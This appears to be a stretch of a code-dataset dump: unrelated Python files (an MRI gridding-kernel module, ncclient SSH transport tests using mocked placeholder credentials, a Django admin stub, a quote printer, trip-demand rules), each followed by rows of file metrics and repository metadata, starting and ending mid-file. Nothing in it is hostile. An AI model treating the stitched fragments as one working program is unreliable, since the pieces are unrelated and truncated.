""".format(
a_token
)
# overwrite smart.yaml w/ config that has auth token in it.
helper_write_yaml_to_disk(example_data, isolated_ultron_config_path)
# Monkeypatch a helper method onto the runner to make running commands
# easier.
runner.run = lambda command: runner.invoke(cli, command.split())
# And another for checking the text output by the command.
runner.output_of = lambda command: runner.run(command).output
# Run click test client
result = runner.invoke(cli, ["--debug", "workspace", "info"])
print(result)
# verify results
assert result.exit_code == 0
# TODO: Use the capture fixture and test that it looks like this
# + /Users/malcolm/.config/ultron8
# + clusters
# + libs
# + smart.yaml
# + templates
# + workspace
| 37.366142 | 97 | 0.639343 | 1,090 | 9,491 | 5.319266 | 0.169725 | 0.060021 | 0.079338 | 0.054329 | 0.808037 | 0.804415 | 0.804415 | 0.798551 | 0.798551 | 0.798551 | 0 | 0.006386 | 0.290591 | 9,491 | 253 | 98 | 37.513834 | 0.854745 | 0.243178 | 0 | 0.691275 | 0 | 0 | 0.152345 | 0 | 0 | 0 | 0 | 0.003953 | 0.067114 | 1 | 0.020134 | false | 0 | 0.120805 | 0 | 0.147651 | 0.033557 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed3f1677749c876db7dd0fffbd717e8ea0f63d3e | 6,246 | py | Python | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet-Myocardial-Parametric-Mapping | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | 4 | 2021-12-15T22:57:44.000Z | 2022-03-18T14:02:15.000Z | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | null | null | null | InLine_Implementation/Code/complexnet/gridkernels.py | HMS-CardiacMR/MyoMapNet | 1e2dee8d6d1f97722eba91618462537faf9efba7 | [
"MIT"
] | null | null | null |
import torch
import numpy as np
import torch.nn as nn
from saveNet import *
from math import exp
def sinc(input, weights):
x, y = torch.unbind(input, dim=-1)
b, c = torch.unbind(weights, dim=-1)
mag = np.pi * ((b*x)**2 + (c*y)**2)**0.5
output = torch.sin(mag)/mag
return output
class GriddingKernels(nn.Module):
def __init__(self, kernel_mat_size=(416, 416), eps=0.0001, init_densiy=None, init_kernel_param=None):
super(GriddingKernels, self).__init__()
self.eps = eps
self.a = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1])), requires_grad=True)
self.b = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1], 2)), requires_grad=True) #for x and y
self.reset_density_comp_params(init_densiy)
self.reset_kernel_params(init_kernel_param)
def reset_density_comp_params(self, init_densiy=None, s=0.025, bias=0.125):
if init_densiy is None:
for i in range(0, self.a.shape[0]):
for j in range(0, self.a.shape[1]):
self.a.data[i, j] = s * (
(i - self.a.shape[0] // 2) ** 2 + (j - self.a.shape[1] // 2) ** 2) ** 0.5 + bias
else:
self.a.data = init_densiy
def reset_kernel_params(self, init_kernel_param=None, s=0.005, bias=0.05):
if init_kernel_param is None:
for i in range(0, self.b.shape[0]):
for j in range(0, self.b.shape[1]):
self.b.data[i, j, 0] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
self.b.data[i, j, 1] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
# self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
else:
self.a.data = init_kernel_param
# def reset_density_comp_params(self, init_densiy=None):
# if init_densiy is None:
# r = 10/(self.a.shape[0]//2)
# for i in range(0, self.a.shape[0]):
# for j in range(0, self.a.shape[1]):
# self.a.data[i, j] = r * ((i-self.a.shape[0]//2)**2 + (j-self.a.shape[1]//2)**2)**0.5 + 2*r
# else:
# self.a.data = init_densiy
#
# def reset_kernel_params(self, init_kernel_param=None):
# if init_kernel_param is None:
# kernel_window_size = 10
# s = (self.b.shape[0]//2) / kernel_window_size
#
# for i in range(0, self.b.shape[0]):
# for j in range(0, self.b.shape[1]):
# self.b.data[i, j, 0] = s / ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2 + 1) ** 0.5
# self.b.data[i, j, 1] = s / ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2 + 1) ** 0.5
# # self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
# else:
# self.a.data = init_kernel_param
def forward(self, Ksp_ri, Loc_xy):
Loc_xy = Loc_xy + self.eps
dims = Ksp_ri.shape
brdcst_a = self.a.unsqueeze(0).unsqueeze(0).unsqueeze(-1).expand((dims[0], dims[1], dims[3], dims[4], dims[5]))
brdcst_b = self.b.unsqueeze(0).unsqueeze(0).expand_as(Loc_xy)
kernel = sinc(Loc_xy, brdcst_b).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
output = brdcst_a * torch.mean(Ksp_ri * kernel, dim=2)
return output
def gaussian(input, weights):
x, y = torch.unbind(input, dim=-1)
b, c = torch.unbind(weights, dim=-1)
output = torch.exp(-( (x/b)**2 + (y/c)**2))
return output
class GaussianGriddingKernels(nn.Module):
def __init__(self, kernel_mat_size=(416, 416), init_densiy=None, init_kernel_param=None):
super(GaussianGriddingKernels, self).__init__()
self.a = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1])), requires_grad=False)
self.b = nn.Parameter(torch.ones((kernel_mat_size[0], kernel_mat_size[1], 2)),
requires_grad=True) # for x and y
self.reset_density_comp_params(init_densiy)
self.reset_kernel_params(init_kernel_param)
def reset_density_comp_params(self, init_densiy=None, s=1/208, bias=0.02):
if init_densiy is None:
for i in range(0, self.a.shape[0]):
for j in range(0, self.a.shape[1]):
self.a.data[i, j] = s * (
(i - self.a.shape[0] // 2) ** 2 + (j - self.a.shape[1] // 2) ** 2) ** 0.5 + bias
else:
self.a.data = init_densiy
def reset_kernel_params(self, init_kernel_param=None, s=0.0002, bias=1):
if init_kernel_param is None:
for i in range(0, self.b.shape[0]):
for j in range(0, self.b.shape[1]):
self.b.data[i, j, 0] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
self.b.data[i, j, 1] = s * (
(i - self.b.shape[0] // 2) ** 2 + (j - self.b.shape[1] // 2) ** 2) ** 0.5 + bias
# self.b.data[i, j, 2] = s * ((i-self.a.shape[0]//2) ** 2 + (j-self.a.shape[1]//2) ** 2) ** 0.5 + 2 * s
else:
self.a.data = init_kernel_param
def forward(self, Ksp_ri, Loc_xy):
dims = Ksp_ri.shape
# print('==================>',self.b[207,207,0].cpu().data.numpy())
# brdcst_a = self.a.unsqueeze(0).unsqueeze(0).unsqueeze(-1).expand((dims[0], dims[1], dims[3], dims[4], dims[5]))
brdcst_b = self.b.unsqueeze(0).unsqueeze(0).expand_as(Loc_xy)
# x, y = torch.unbind(Loc_xy, dim=-1)
# denst = (2*((x**2 + y**2)**0.5)/dims[-2]).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
# Ksp_ri = denst * Ksp_ri
kernel = gaussian(Loc_xy, brdcst_b).unsqueeze(1).unsqueeze(-1).expand_as(Ksp_ri)
# output = brdcst_a * torch.mean(Ksp_ri * kernel, dim=2)
output = torch.mean(Ksp_ri * kernel, dim=2)
return output
| 44.614286 | 125 | 0.527858 | 1,001 | 6,246 | 3.151848 | 0.095904 | 0.057052 | 0.0729 | 0.045642 | 0.827892 | 0.81458 | 0.80729 | 0.80729 | 0.772742 | 0.757211 | 0 | 0.056826 | 0.292827 | 6,246 | 139 | 126 | 44.935252 | 0.65746 | 0.261447 | 0 | 0.609756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121951 | false | 0 | 0.060976 | 0 | 0.256098 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
92ebd9acff8242bbbb3b1d706d35994d783ca754 | 749 | py | Python | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | code/Tragedy.py | HarshRat/hacktoberfest-2018 | 77b0896d8fab34536bb1361085e8afcab9b5430f | [
"MIT"
] | null | null | null | print("Did you ever hear the tragedy of Darth Plagueis The Wise? I thought not. It's not a story the Jedi would tell you. It's a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so powerful and so wise he could use the Force to influence the midichlorians to create life… He had such a knowledge of the dark side that he could even keep the ones he cared about from dying. The dark side of the Force is a pathway to many abilities some consider to be unnatural. He became so powerful… the only thing he was afraid of was losing his power, which eventually, of course, he did. Unfortunately, he taught his apprentice everything he knew, then his apprentice killed him in his sleep. Ironic. He could save others from death, but not himself.")
| 374.5 | 748 | 0.782377 | 143 | 749 | 4.13986 | 0.594406 | 0.025338 | 0.037162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184246 | 749 | 1 | 749 | 749 | 0.959083 | 0 | 0 | 0 | 0 | 1 | 0.986649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
132554c79d368c2659a005c8f3de4f2f4a6079dd | 149 | py | Python | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | 1 | 2021-09-01T23:55:27.000Z | 2021-09-01T23:55:27.000Z | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | 1 | 2021-09-09T06:21:48.000Z | 2021-09-14T02:08:33.000Z | algorithms/library/methods/usg/__init__.py | heitor57/poi-rss | 12990af118f19595be01bf80e26a7ee93f9d05d8 | [
"MIT"
] | null | null | null | import sys, os
sys.path.insert(0, os.path.abspath('..'))
from . import UserBasedCF
from . import FriendBasedCF
from . import PowerLaw
import metrics
| 21.285714 | 41 | 0.758389 | 21 | 149 | 5.380952 | 0.571429 | 0.265487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007692 | 0.127517 | 149 | 6 | 42 | 24.833333 | 0.861538 | 0 | 0 | 0 | 0 | 0 | 0.013423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
135cdadeef5241976b2252c32b0193fc1e47d12b | 143 | py | Python | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 2 | 2019-07-30T14:28:13.000Z | 2020-07-25T04:48:43.000Z | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 9 | 2020-06-05T22:12:20.000Z | 2022-01-13T01:28:05.000Z | web/peerstachio/apps/todo/admin.py | FuzedxPheonix/peerstachio-opensource | f681c7454ee795667c32a785809b0f88e4d432fa | [
"Unlicense"
] | 1 | 2019-10-21T01:19:13.000Z | 2019-10-21T01:19:13.000Z | from django.contrib import admin
from .models import Item
class ItemAdmin(admin.ModelAdmin):
pass
admin.site.register(Item, ItemAdmin)
| 14.3 | 36 | 0.776224 | 19 | 143 | 5.842105 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146853 | 143 | 9 | 37 | 15.888889 | 0.909836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
13b60663eac0d399166fb39f8f215936c3f6efe6 | 15,544 | py | Python | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 7 | 2017-07-13T21:20:21.000Z | 2021-03-13T05:15:53.000Z | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 3 | 2018-01-09T14:03:47.000Z | 2018-11-04T22:29:54.000Z | test/unit/transport/test_ssh.py | CiscoDevNet/ncclient | ab705fbe5eb7cae23e96e0682273fc9c2ed61739 | [
"Apache-2.0"
] | 7 | 2017-08-23T15:49:24.000Z | 2021-04-22T05:51:46.000Z | # -*- coding: utf-8 -*-
import unittest
try:
from unittest.mock import MagicMock, patch # Python 3.4 and later
except ImportError:
from mock import MagicMock, patch
from ncclient.transport.ssh import SSHSession
from ncclient.transport import AuthenticationError, SessionCloseError, NetconfBase
import paramiko
from ncclient.devices.junos import JunosDeviceHandler
import sys
import socket
try:
import selectors
except ImportError:
import selectors2 as selectors
reply_data = """<rpc-reply xmlns:junos="http://xml.juniper.net/junos/12.1X46/junos" attrib1 = "test">
<software-information>
<host-name>R1</host-name>
<product-model>firefly-perimeter</product-model>
<product-name>firefly-perimeter</product-name>
<package-information>
<name>junos</name>
<comment>JUNOS Software Release [12.1X46-D10.2]</comment>
</package-information>
</software-information>
<cli>
<banner></banner>
</cli>
</rpc-reply>"""
reply_ok = """<rpc-reply>
<ok/>
<rpc-reply/>"""
# A buffer of data with two complete messages and an incomplete message
rpc_reply = reply_data + "\n]]>]]>\n" + reply_ok + "\n]]>]]>\n" + reply_ok
reply_ok_chunk = "\n#%d\n%s\n##\n" % (len(reply_ok), reply_ok)
# einarnn: this test message had to be reduced in size as the improved
# 1.1 parsing finds a whole fragment in it, so needed to have less
# data in it than the terminating '>'
reply_ok_partial_chunk = "\n#%d\n%s" % (len(reply_ok), reply_ok[:-1])
# A buffer of data with two complete messages and an incomplete message
rpc_reply11 = "\n#%d\n%s\n#%d\n%s\n##\n%s%s" % (
30, reply_data[:30], len(reply_data[30:]), reply_data[30:],
reply_ok_chunk, reply_ok_partial_chunk)
rpc_reply_part_1 = """<rpc-reply xmlns:junos="http://xml.juniper.net/junos/12.1X46/junos" attrib1 = "test">
<software-information>
<host-name>R1</host-name>
<product-model>firefly-perimeter</product-model>
<product-name>firefly-perimeter</product-name>
<package-information>
<name>junos</name>
<comment>JUNOS Software Release [12.1X46-D10.2]</comment>
</package-information>
</software-information>
<cli>
<banner></banner>
</cli>
</rpc-reply>
]]>]]"""
rpc_reply_part_2 = """>
<rpc-reply>
<ok/>
<rpc-reply/>"""
class TestSSH(unittest.TestCase):
def _test_parsemethod(self, mock_dispatch, parsemethod, reply, ok_chunk,
expected_messages):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
obj._buffer.write(bytes(reply, "utf-8"))
remainder = bytes(ok_chunk, "utf-8")
else:
obj._buffer.write(reply)
remainder = ok_chunk
# parse the main reply
parsemethod(obj)
# parse the ok
parsemethod(obj)
for i in range(0, len(expected_messages)):
call = mock_dispatch.call_args_list[i][0][0]
self.assertEqual(call, expected_messages[i])
self.assertEqual(obj._buffer.getvalue(), remainder)
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse(self, mock_dispatch):
self._test_parsemethod(mock_dispatch, SSHSession._parse, rpc_reply,
"\n" + reply_ok, [reply_data])
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse11(self, mock_dispatch):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
obj._buffer.write(bytes(rpc_reply11, "utf-8"))
remainder = bytes(reply_ok_partial_chunk, "utf-8")
else:
obj._buffer.write(rpc_reply11)
remainder = reply_ok_partial_chunk
obj.parser._parse11()
expected_messages = [reply_data, reply_ok]
for i in range(0, len(expected_messages)):
call = mock_dispatch.call_args_list[i][0][0]
self.assertEqual(call, expected_messages[i])
self.assertEqual(obj._buffer.getvalue(), remainder)
@patch('ncclient.transport.ssh.Session._dispatch_message')
def test_parse_incomplete_delimiter(self, mock_dispatch):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
if sys.version >= "3.0":
b = bytes(rpc_reply_part_1, "utf-8")
obj._buffer.write(b)
obj._parse()
self.assertFalse(mock_dispatch.called)
b = bytes(rpc_reply_part_2, "utf-8")
obj._buffer.write(b)
obj._parse()
self.assertTrue(mock_dispatch.called)
else:
obj._buffer.write(rpc_reply_part_1)
obj._parse()
self.assertFalse(mock_dispatch.called)
obj._buffer.write(rpc_reply_part_2)
obj._parse()
self.assertTrue(mock_dispatch.called)
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.agent.AgentSSH.get_keys')
def test_auth_agent(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey(msg="hello")
mock_get_key.return_value = [key]
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], True, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.agent.AgentSSH.get_keys')
def test_auth_agent_exception(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.return_value = [key]
mock_auth_public_key.side_effect = paramiko.ssh_exception.AuthenticationException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], True, False)
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_keyfiles(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.return_value = key
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', ["key_file_name"], False, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_keyfiles_exception(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.side_effect = paramiko.ssh_exception.PasswordRequiredException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, ["key_file_name"], False, True)
@patch('os.path.isfile')
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_default_keyfiles(self, mock_get_key, mock_auth_public_key,
mock_is_file):
key = paramiko.PKey()
mock_get_key.return_value = key
mock_is_file.return_value = True
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], False, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('os.path.isfile')
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_default_keyfiles_exception(self, mock_get_key,
mock_auth_public_key, mock_is_file):
key = paramiko.PKey()
mock_is_file.return_value = True
mock_get_key.side_effect = paramiko.ssh_exception.PasswordRequiredException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], False, True)
@patch('paramiko.transport.Transport.auth_password')
def test_auth_password(self, mock_auth_password):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], False, True)
self.assertEqual(
mock_auth_password.call_args_list[0][0],
('user',
'password'))
@patch('paramiko.transport.Transport.auth_password')
def test_auth_exception(self, mock_auth_password):
mock_auth_password.side_effect = Exception
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth, 'user', 'password', [], False, True)
def test_auth_no_methods_exception(self):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], False, False)
@patch('paramiko.transport.Transport.close')
def test_close(self, mock_close):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._transport.active = True
obj._connected = True
obj.close()
mock_close.assert_called_once_with()
self.assertFalse(obj._connected)
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key(self, mock_load):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts("file_name")
mock_load.assert_called_once_with("file_name")
@patch('os.path.expanduser')
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key_2(self, mock_load, mock_os):
mock_os.return_value = "file_name"
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts()
mock_load.assert_called_once_with("file_name")
@patch('os.path.expanduser')
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key_IOError(self, mock_load, mock_os):
mock_os.return_value = "file_name"
mock_load.side_effect = IOError
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts()
mock_load.assert_called_with("file_name")
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.recv')
@patch('selectors.DefaultSelector.select')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_receive_py3(self, mock_error, mock_selector, mock_recv, mock_close):
mock_selector.return_value = True
mock_recv.return_value = 0
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj.run()
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
def test_run_send_py3_10(self):
self._test_run_send_py3(NetconfBase.BASE_10,
lambda msg: msg.encode() + b"]]>]]>")
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
def test_run_send_py3_11(self):
def chunker(msg):
encmsg = msg.encode()
chunks = b"\n#%i\n%b\n##\n" % (len(encmsg), encmsg)
return chunks
self._test_run_send_py3(NetconfBase.BASE_11, chunker)
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.send_ready')
@patch('paramiko.channel.Channel.send')
@patch('selectors.DefaultSelector.select')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def _test_run_send_py3(self, base, chunker, mock_error, mock_selector,
mock_send, mock_ready, mock_close):
mock_selector.return_value = False
mock_ready.return_value = True
mock_send.return_value = -1
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
msg = "naïve garçon"
obj._q.put(msg)
obj._base = base
obj.run()
self.assertEqual(mock_send.call_args_list[0][0][0], chunker(msg))
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skipIf(sys.version_info.major >= 3, "test not supported >= Python3")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.recv')
@patch('selectors2.DefaultSelector')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_receive_py2(self, mock_error, mock_selector, mock_recv, mock_close):
mock_selector.select.return_value = True
mock_recv.return_value = 0
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj.run()
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skip("test currently non-functional")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.send_ready')
@patch('paramiko.channel.Channel.send')
@patch('selectors2.DefaultSelector')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_send_py2(self, mock_error, mock_selector, mock_send, mock_ready, mock_close):
mock_selector.select.return_value = False
mock_ready.return_value = True
mock_send.return_value = -1
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj._q.put("rpc")
obj.run()
self.assertEqual(mock_send.call_args_list[0][0][0], "rpc]]>]]>")
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
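For reference, the two message framings exercised by the send tests above can be sketched as standalone helpers. The function names here are illustrative, not part of ncclient:

```python
def frame_10(msg: str) -> bytes:
    # NETCONF 1.0 framing: the message followed by the ]]>]]> end-of-message delimiter.
    return msg.encode() + b"]]>]]>"


def frame_11(msg: str) -> bytes:
    # NETCONF 1.1 chunked framing: \n#<byte-count>\n<chunk>\n##\n,
    # where the count is the length of the *encoded* chunk in bytes.
    enc = msg.encode()
    return b"\n#%i\n%b\n##\n" % (len(enc), enc)


assert frame_10("rpc") == b"rpc]]>]]>"
assert frame_11("hi") == b"\n#2\nhi\n##\n"
# Non-ASCII text: "naïve garçon" is 12 characters but 14 UTF-8 bytes.
assert frame_11("na\u00efve gar\u00e7on").startswith(b"\n#14\n")
```

The byte count is taken after encoding, which is why `_test_run_send_py3` deliberately uses a non-ASCII message.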
| 41.013193 | 107 | 0.653435 | 1,827 | 15,544 | 5.287356 | 0.120963 | 0.05383 | 0.064182 | 0.072464 | 0.821118 | 0.797308 | 0.781159 | 0.752174 | 0.752174 | 0.728986 | 0 | 0.012479 | 0.221565 | 15,544 | 378 | 108 | 41.121693 | 0.785868 | 0.024833 | 0 | 0.665654 | 0 | 0.009119 | 0.218115 | 0.130116 | 0 | 0 | 0 | 0 | 0.085106 | 1 | 0.072948 | false | 0.042553 | 0.039514 | 0 | 0.118541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13bdf5a6986e21b1ae54aaa2d2dcf067a0f73168 | 2,341 | py | Python | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from math import sqrt


def rain_factor(period):
    if period.rain:
        return 1.2
    return 1


def dist_factor(reg1, reg2):
    dist = 0
    for i in range(2):
        dist += (reg1.coordinates[i] - reg2.coordinates[i]) ** 2
    dist = sqrt(dist)
    return 1 / dist


def rule1(reg1, reg2, day, period, core_param):
    if (period.number != 0 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.population * reg2.job_density * rain_factor(period)


def rule2(reg1, reg2, day, period, core_param):
    if (period.number != 1 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.job_density * reg2.population * rain_factor(period)


def rule3(reg1, reg2, day, period, core_param):
    if (period.number != 0 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.population * reg2.service_density * dist_factor(reg1, reg2) * rain_factor(period)


def rule4(reg1, reg2, day, period, core_param):
    if (period.number != 1 or
            reg1.name == reg2.name or
            day.weekday > 4):
        return 0
    return core_param * reg1.service_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)


def rule5(reg1, reg2, day, period, core_param):
    if (period.number != 1 or
            reg1.name == reg2.name or
